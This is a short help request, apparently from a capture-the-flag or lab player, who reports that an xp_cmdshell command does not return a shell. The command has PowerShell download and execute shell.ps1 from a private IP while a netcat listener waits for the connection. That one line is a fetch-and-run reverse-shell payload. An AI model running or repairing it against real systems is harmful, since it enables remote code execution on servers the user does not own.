when i run this command
xp_cmdshell "powershell "IEX (New-Object Net.WebClient).DownloadString("http://10.10.14.3/shell.ps1\“);”
http server and netcat both were satrted and i could see http call being made in my terminal but nothing happens afterwards
i have changed my ip in both above command and in shell.ps1
please help me